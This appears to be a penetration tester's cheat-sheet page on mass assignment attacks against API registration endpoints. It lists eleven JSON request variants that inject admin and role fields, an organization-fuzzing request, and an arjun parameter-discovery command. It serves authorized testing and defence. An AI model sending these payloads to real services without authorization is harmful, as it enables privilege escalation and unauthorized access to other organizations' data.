mass assignment

Mass Assignment Testing Steps

Target Vulnerabilities:

  • Account Registration

  • Unauthorized Access to Organizations

  • Reset Password

  • Login

  • Change Email

  • Change Username

Account Registration Request:

  • Basic Request:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "password": "Password1!"
}

Mass Assignment Variations:

  1. Try with admin key:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "admin": true,
  "password": "Password1!"
}

  2. Try with ADMIN key:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "ADMIN": true,
  "password": "Password1!"
}

  3. Try with isadmin key:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "isadmin": true,
  "password": "Password1!"
}

  4. Try with ISADMIN key:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "ISADMIN": true,
  "password": "Password1!"
}

  5. Try with Admin key:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "Admin": true,
  "password": "Password1!"
}

  6. Try with role set to admin:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "role": "admin",
  "password": "Password1!"
}

  7. Try with role set to ADMIN:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "role": "ADMIN",
  "password": "Password1!"
}

  8. Try with role set to administrator:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "role": "administrator",
  "password": "Password1!"
}

  9. Try with user_priv set to administrator:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "user_priv": "administrator",
  "password": "Password1!"
}

  10. Try with user_priv set to admin:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "user_priv": "admin",
  "password": "Password1!"
}

  11. Try with admin as integer:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "admin": 1,
  "password": "Password1!"
}

Unauthorized Access to Organizations:

  • Register with Organization:

    POST /api/v1/register
--snip--
{
  "username": "hAPI_hacker",
  "email": "hapi@hacker.com",
  "org": "§CompanyA§",
  "password": "Password1!"
}

Finding Variables in Documentation:

  • Read documentation to find variables, Some Tips here.

Fuzzing Unknown Variables:

  • Perform actions in the web application, intercept requests, and locate additional headers or parameters.

    POST /create/user
--snip--
{
  "username": "hapi_hacker",
  "pass": "ff7ftw",
  "uam": 1,
  "mfa": true,
  "account": 101
}

Automating Mass Assignment Attacks:

  • Use Arjun and Burp Suite Intruder:

    bashCopy codearjun --headers "Content-Type: application/json" -u http://vulnhost.com/api/register -m JSON --include='{$arjun$}'
PreviousidorNextaem misconfiguration

Last updated